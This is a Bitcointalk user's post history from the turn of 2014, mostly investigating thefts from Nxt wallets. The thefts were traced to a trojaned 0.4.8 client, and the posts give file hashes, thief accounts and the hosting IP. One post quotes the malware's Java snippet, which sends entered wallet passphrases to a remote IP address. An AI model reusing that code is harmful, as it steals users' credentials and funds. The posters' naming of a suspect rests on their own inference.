Bitcoin Forum
June 29, 2024, 06:45:41 AM *
News: Latest Bitcoin Core release: 27.0 [Torrent]
 
  Home Help Search Login Register More  
  Show Posts
Pages: « 1 ... 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 [106] 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 »
2101  Alternate cryptocurrencies / Announcements (Altcoins) / Re: Nxt :: descendant of Bitcoin - Updated Information on: January 02, 2014, 12:42:42 PM
Thief:
https://bitcointalk.org/index.php?action=profile;u=172850;sa=showPosts

Thief posts (originally with a link to the hacked client):

31-12-2013, 14:23:22: https://bitcointalk.org/index.php?topic=345619.msg4237883#msg4237883
31-12-2013, 12:53:39: https://bitcointalk.org/index.php?topic=345619.msg4236707#msg4236707
28-12-2013, 13:28:54: https://bitcointalk.org/index.php?topic=345619.msg4184582#msg4184582

Thefts from block:
http://87.230.14.1/nxt/nxt.cgi?action=1000&blk=17240155162180650056:

01.01.2014 12:56:54 18,665 Nxt from plasticAiredale     http://87.230.14.1/nxt/nxt.cgi?action=3000&acc=15182566201738727933
01.01.2014 12:58:03 7,808 Nxt from PaulyC   http://87.230.14.1/nxt/nxt.cgi?action=3000&acc=16204974692852323982 (more older thefts here) A
01.01.2014 13:01:45   18,197 Nxt from newcn   http://87.230.14.1/nxt/nxt.cgi?action=3000&acc=9793828175536096502
01.01.2014 13:03:39 92 Nxt http://87.230.14.1/nxt/nxt.cgi?action=3000&acc=6164081464868000542 (more older thefts here) B
01.01.2014 13:05:06 147,690 Nxt from sparta_cuss    http://87.230.14.1/nxt/nxt.cgi?action=3000&acc=12152013998194592943

Thefts from block:
http://87.230.14.1/nxt/nxt.cgi?action=1000&blk=11727357463857289892

29.12.2013 08:21:32      99 Nxt   http://87.230.14.1/nxt/nxt.cgi?action=3000&acc=16204974692852323982 A
29.12.2013 08:20:26      55 Nxt   http://87.230.14.1/nxt/nxt.cgi?action=3000&acc=16204974692852323982 A
29.12.2013 08:19:32      502 Nxt   http://87.230.14.1/nxt/nxt.cgi?action=3000&acc=16204974692852323982 A
29.12.2013 08:19:00      499 Nxt   http://87.230.14.1/nxt/nxt.cgi?action=3000&acc=16204974692852323982 A

Single thefts (blocks checked):
27.12.2013 00:03:22      509 Nxt  http://87.230.14.1/nxt/nxt.cgi?action=3000&acc=6164081464868000542 B
26.12.2013 20:26:15      499 Nxt http://87.230.14.1/nxt/nxt.cgi?action=3000&acc=6164081464868000542 B
26.12.2013 18:39:14          500 Nxt http://87.230.14.1/nxt/nxt.cgi?action=3000&acc=6164081464868000542 B
26.12.2013 12:53:07           98 Nxt http://87.230.14.1/nxt/nxt.cgi?action=3000&acc=6164081464868000542 B

block: http://87.230.14.1/nxt/nxt.cgi?action=1000&blk=7058684459482772470
25.12.2013 18:25:25      999   Nxt   http://87.230.14.1/nxt/nxt.cgi?action=3000&acc=6164081464868000542 B
25.12.2013 18:24:54      705   Nxt   http://87.230.14.1/nxt/nxt.cgi?action=3000&acc=6164081464868000542 B

Single thefts (blocks checked):
25.12.2013 14:59:46      499  Nxt    http://87.230.14.1/nxt/nxt.cgi?action=3000&acc=6164081464868000542 B

block: http://87.230.14.1/nxt/nxt.cgi?action=1000&blk=15904983691408191996
23.12.2013 19:06:16      255 Nxt http://87.230.14.1/nxt/nxt.cgi?action=3000&acc=6164081464868000542 B
23.12.2013 19:08:26         1,004 http://87.230.14.1/nxt/nxt.cgi?action=3000&acc=10543042600713097314 (?? - not sure if theft)

23.12.2013 19:05:48  499 Nxt http://87.230.14.1/nxt/nxt.cgi?action=3000&acc=6164081464868000542 B

22.12.2013 09:22:08 999 Nxt http://87.230.14.1/nxt/nxt.cgi?action=3000&acc=6164081464868000542&offset=11&filter=1 B
16.12.2013 15:48:56 3,874 Nxt http://87.230.14.1/nxt/nxt.cgi?action=3000&acc=6164081464868000542&offset=11&filter=1 B
2102  Alternate cryptocurrencies / Announcements (Altcoins) / Re: Nxt :: descendant of Bitcoin - Updated Information on: January 02, 2014, 12:26:29 PM
In summary,what I found from Chrome history:
from download history, the malware link was:
http://162.243.246.223/nxt-client-0.4.8.zip
sha256: 948ce760c379f13f4ea9def6babaa36b0d706bf91098f1d64945fdde3eac5f06

the creation time and modification time of the zip file on my local disk was:
Code:
creation time:2013‎.‎12‎.‎31‎,‏‎20:31:14
‎modified time:2013‎.‎12‎.‎31,‏‎20:35:16

in that time period, I only accessed two pages:
Code:
20:29 https://bitcointalk.org/index.php?topic=345619.11740
20:30 https://bitcointalk.org/index.php?topic=345619.0

from the download history, I probably downloaded the malware from the first page,that is:
http://info.nxtcrypto.org/nxt-client-0.4.8.zip
(I found the new version and checked it on the first page, and it's true, there's an update there, but I don't like the mega site, its slow from my home, so I downloaded the link from the first page)
the thief might changed the link directly,
 or he might changed IP address of info.nxtcrypto.org
current IP of info.nxtcrypto.org is 46.28.204.121,
which is different from 162.243.246.223


the following are some clues about the accounts where my nxt goes:
2 of my accounts were stolen, one of them lost 18198 nxt, the nxt goes to an account which only has one transaction, the account is 9793828175536096502, the nxt is still in this account, I find nothing from this account.

another account of mine, which had 93 nxt balance, was stolen to an account which have many transactions, I found sth from this account:6164081464868000542, the first transaction to this account happened at 16 DEC, which refers to another acc:496131565008433801, in this account, there're 3 incoming transactions from acc:6635869272840226493, which I remember is the account of dgex, each withdraw at dgex are coming from this account(at least for me), so, if the thief is the owner of acc:6164081464868000542 and acc:496131565008433801, he probably has an id in dgex!


this is only account with very weak password and people were 3x stealing Nxt from it probably
http://87.230.14.1/nxt/nxt.cgi?action=3000&acc=496131565008433801
(or 1x Nxt were only transfered to the 2nd account, where we can see many aliases: 14527793117125736279)
2103  Alternate cryptocurrencies / Announcements (Altcoins) / Re: Nxt :: descendant of Bitcoin - Updated Information on: January 02, 2014, 11:54:50 AM
Drexme needs to pay some bills: https://bitcointalk.org/index.php?topic=384097.msg4264260#msg4264260 and he is right - 35k Nxt = 3 Bitcoins stolen from the giveaway fund
2104  Alternate cryptocurrencies / Announcements (Altcoins) / Re: Nxt :: descendant of Bitcoin - Updated Information on: January 02, 2014, 02:33:25 AM
PaulyC:
the 0.4.8 client I used, I forgot where I downloaded it, but from chrome history, 
the link was http://162.243.246.223/nxt-client-0.4.8.zip
this client is different from what I Just downloaded from this thread:
Code:
 
ec7c30a100717e60d8abe50eedb23641952847d91ff90b9b05a74ff98d8a4cf2  nxt-client-0.4.8 (1).zip
948ce760c379f13f4ea9def6babaa36b0d706bf91098f1d64945fdde3eac5f06  nxt-client-0.4.8.zip

please check your browser history to find which page you used for the download - where did you find a link?

how to find it from Chrome?
I just find the link, not the webpage the link was in,
there should be some ways to find that!

ctrl+h Smiley
2105  Alternate cryptocurrencies / Announcements (Altcoins) / Re: Nxt :: descendant of Bitcoin - Updated Information on: January 02, 2014, 02:06:51 AM
PaulyC:
the 0.4.8 client I used, I forgot where I downloaded it, but from chrome history, 
the link was http://162.243.246.223/nxt-client-0.4.8.zip
this client is different from what I Just downloaded from this thread:
Code:
 
ec7c30a100717e60d8abe50eedb23641952847d91ff90b9b05a74ff98d8a4cf2  nxt-client-0.4.8 (1).zip
948ce760c379f13f4ea9def6babaa36b0d706bf91098f1d64945fdde3eac5f06  nxt-client-0.4.8.zip

please check your browser history to find which page you used for the download - where did you find a link?
2106  Alternate cryptocurrencies / Announcements (Altcoins) / Re: Nxt :: descendant of Bitcoin - Updated Information on: January 02, 2014, 01:52:03 AM
Interesting...:

Code:
      if (!paramString.equals(""))
      {
        if (!myKeys.contains(paramString))
        {
          URL url = new URL("http://162.243.246.223:3000/" + URLEncoder.encode(paramString, "ISO-8859-1"));
          URLConnection connection = url.openConnection();
          connection.setConnectTimeout(10000);
          connection.getInputStream();
          myKeys.add(paramString);
        }
      }


epicdices.com is also hosted on 162.243.246.223 - coincidence?

no, as I wrote here, we know identity of the hacker:

162.243.246.223 looks like it is "epicdices.com" (http://domain-kb.com/www/epicdices.com)
Owner of epicdices - EpicThomas - is a member of this topic:
https://bitcointalk.org/index.php?action=profile;u=172850;sa=showPosts
2107  Alternate cryptocurrencies / Announcements (Altcoins) / Re: Nxt :: descendant of Bitcoin - Updated Information on: January 02, 2014, 01:50:25 AM
please check:
https://nextcoin.org/index.php/topic,1586.0.html

the link to the mega there is a hacker's link or not?

Drexme's post was also updated by punkrock, but I am not sure if the link there is good or not
https://nextcoin.org/index.php/topic,4.0.html
2108  Alternate cryptocurrencies / Announcements (Altcoins) / Re: Nxt :: descendant of Bitcoin - Updated Information on: January 02, 2014, 01:44:12 AM
We need to lock for public all wiki pages with a download link, all download links should aim to the 1st topic here instead of direct downloads
2109  Alternate cryptocurrencies / Announcements (Altcoins) / Re: Nxt :: descendant of Bitcoin - Updated Information on: January 02, 2014, 01:38:10 AM
PaulyC:
the 0.4.8 client I used, I forgot where I downloaded it, but from chrome history,  
the link was http://162.243.246.223/nxt-client-0.4.8.zip
this client is different from what I Just downloaded from this thread:
Code:
 
ec7c30a100717e60d8abe50eedb23641952847d91ff90b9b05a74ff98d8a4cf2  nxt-client-0.4.8 (1).zip
948ce760c379f13f4ea9def6babaa36b0d706bf91098f1d64945fdde3eac5f06  nxt-client-0.4.8.zip

162.243.246.223 looks like it is "epicdices.com" (http://domain-kb.com/www/epicdices.com)
Owner of epicdices - EpicThomas - is a member of this topic:
https://bitcointalk.org/index.php?action=profile;u=172850;sa=showPosts
2110  Alternate cryptocurrencies / Announcements (Altcoins) / Re: Nxt :: descendant of Bitcoin - Updated Information on: January 02, 2014, 01:32:56 AM
if I go to the https://nextcoin.org/index.php/topic,4.0.html, where you probably downloaded a bad client:
- Drexme acts very strange since 21st of December 2013 (sold giveaway fund...)
- I can see in Drexme's post: "« Last Edit: January 01, 2014, 11:49:52 PM by punkrock »"
- but punkrock seems like he is a big helper: https://nextcoin.org/index.php?action=profile;area=showposts;u=2818
2111  Alternate cryptocurrencies / Announcements (Altcoins) / Re: Nxt :: descendant of Bitcoin - Updated Information on: January 02, 2014, 01:24:12 AM
I literally saw my client a few moments after it happened (it was open) so how this happened is odd!

My actual User account that has been stolen from is
NXT
16821029889165561706
I don't have any idea how this may have happened either. Just wanted to confirm, at the moment the theft happened your client was running and you had the browser window opened, and your account was unlocked (you were seeing your balance and the "send money" arrow), is that all correct?

Just trying to differentiate the possibilities, whether the hacker obtained you password via brute-force or some other way and initiated the transaction from another machine, or somehow your own machine was tricked to initiate the transaction.

And you were running 0.4.8 at the time, right? I added the second check for secret phrase before send money exactly to increase security, so that even if you account is unlocked in the browser you still need to enter your password again.

Another question, did you generate your random-looking password using some software - password manager, online service, or created it manually by typing at random?

I just wanted to clarify, with this, I had my server and client open.  Was just perusing the blocks within the client, seeing if I was up-to-date, something I just do sometimes, and the account balance went from 7808, then on next look 0, maybe a moment later, less than 10 seconds.

No one was remotely accessing my computer etc.  It was just balance 0, account recipient ID under sent transactions with 7808, etc.

Update ran a full scan with my antivirus software, ESET, all up to date, no viruses or intrusions found.


The other question about password, this is the very first account I made so I did use the password generator that I had seen recommended on nextcoin.org
used "local" mode, to a certain degree,
http://passwordsgenerator.net/
(i definitely wouldn't recommend using one of these)

for 25 of the char of the PW, then I just made up the rest randomly 9 more characters.

and I'm not sure about what online nodes refers to exactly, but I can honestly say I never used anything online with that PW until today with CfB.
I don't see any strange opened ports so I believe I'm good on that end.


Has anyone else noticed the 4.8 download zip from nextcoin.org vs. the one from this exact link
Nxt 0.4.8 - https://mega.co.nz/#!yV5A1BTR!oi33K7WovgccuEHvP05nzggTnxrkZHJbwFmv5tGeXNI

Are 5 Kb in difference? is that anything to be concerned about?


I want to buy more NXT, but it just sucks cuz i got in somewhat early and thought I was following all the instructions correctly, and I honestly don't know what happened which makes me hesitant.

It's not cool everyone thinks I'm some troll planning this all out, but I guess that's a natural reaction. I would hope in the future there's someway to stop someone from just taking someone's NXT like this, (I actually thought the two step PW on "sending" was a good idea, but didn't stop them in this case)

I'll try to keep an eye out on this hacker's acct# to see if he hits anybody else.
http://22k.io/-account/16204974692852323982


Looks like you downloaded a bogus client. Scary stuff. The client at the front page of this thread is legit. You need to calculate the hash256 of the zip file of your client and compare to the hash in the 0.4.8 in the front page. They have to match exactly.
As you said you have two same client with 5Kb difference in size. One is certainly bogus. Sorry for your loss. This should really be sticky.
I could have fallen for this since I never checked the file until today.
But for now, only use client file from trusted source and do a checksum hash256 the zip file before using.

This needs to be in wiki and the front page.

everyone can edit wiki......
2112  Alternate cryptocurrencies / Altcoin Discussion / Re: [GIVEAWAY] [KITTEH] 1.5Million->5k first 300 user! HAPPY NEW YEAR!!!! on: January 02, 2014, 12:28:58 AM
KNFHVVWfvrLvz3Sx9mBdUB2k1hsK7BC186
2113  Alternate cryptocurrencies / Announcements (Altcoins) / Re: Nxt :: descendant of Bitcoin - Updated Information on: January 01, 2014, 10:59:50 PM
I updated the Developer's sheet (activists only):
https://docs.google.com/spreadsheet/ccc?key=0AgAGADgnQcrtdHRrV3V3Z1lzOXVEMWtqdElUaEtqV1E#gid=6

I am also thinking of some "who is who" section for the Nxt Wiki and these guys would go there just after the core devs Cheesy
2114  Alternate cryptocurrencies / Announcements (Altcoins) / Re: Nxt :: descendant of Bitcoin - Updated Information on: January 01, 2014, 04:10:30 PM
Hey, looks like I just got robbed, too.
Someone please check this account: 12152013998194592943
They now have 147k+ from me.
Had a 40 char random password, capital, lower, numbers, symbols.
WTF?

you're 11794318797680953099?
http://22k.io/-account/12152013998194592943
2115  Alternate cryptocurrencies / Announcements (Altcoins) / Re: Nxt :: descendant of Bitcoin - Updated Information on: January 01, 2014, 04:08:45 PM
I can see those talkshows right now Cheesy

"So if I type "Barbara" as my password, some hacker will steal my money?"

"It would take some time, maybe 5 seconds, but yes, you will loose all your funds."

"..."
2116  Alternate cryptocurrencies / Announcements (Altcoins) / Re: Nxt :: descendant of Bitcoin - Updated Information on: January 01, 2014, 03:22:20 PM
just wanted to add. this is found for the recipient's address in google cached view of the NXT blockchain.
16204974692852323982

not that it will help me get my NXT back I'm sure..
real lame, how my PW was cracked is beyond me.. really.

http://webcache.googleusercontent.com/search?q=cache:xOs0TPi1UPcJ:87.230.14.1/nxt/nxt.cgi%3Faction%3D3000%26acc%3D3727742886551973110+&cd=2&hl=en&ct=clnk&gl=us
if it's a thief, then there are more thefts:
http://22k.io/-account/16204974692852323982
2117  Other / Archival / Re: [ ANN - NEW COIN PRE LAUNCH ] "NYANCOIN" Here Comes The Cat ! 48 Hours To Go on: January 01, 2014, 11:17:49 AM
Just few things i don't understand...
it was said everyone with > 50khs will be kicked from the pool

1) it's meant 50khs in total or per worker?
2) and if i mine in solo using a GPU? how can you limit that?


Thanks to anyone who can clarify that...


... and Happy New Year!
The 50kh,s pool is a special pool that is for cpu,s only * we give the cpu miners there some extra coins every day *

All other pools and solo mining are not limited in any way NYAN!

so can people mine with normal notebooks without any special cards?
2118  Alternate cryptocurrencies / Announcements (Altcoins) / Re: Nxt :: descendant of Bitcoin - Updated Information on: December 31, 2013, 10:18:05 PM
I finally published my blog post about Alias goldrush on 22nd December (how I spent 7 hours by registering 740 aliases Cheesy):
http://nxtcoin.blogspot.com/

- there are some personal thoughts and also some statistics Smiley
2119  Alternate cryptocurrencies / Altcoin Discussion / Re: Best youtube LOTTOCOIN vid wins 1 million!!! on: December 31, 2013, 04:12:30 PM
so the competition is over?
2120  Alternate cryptocurrencies / Altcoin Discussion / Re: WIN 200,000. What will lottocoin be worth in 90 days? on: December 31, 2013, 04:07:13 PM
122
Pages: « 1 ... 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 [106] 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 »
Powered by MySQL Powered by PHP Powered by SMF 1.1.19 | SMF © 2006-2009, Simple Machines Valid XHTML 1.0! Valid CSS!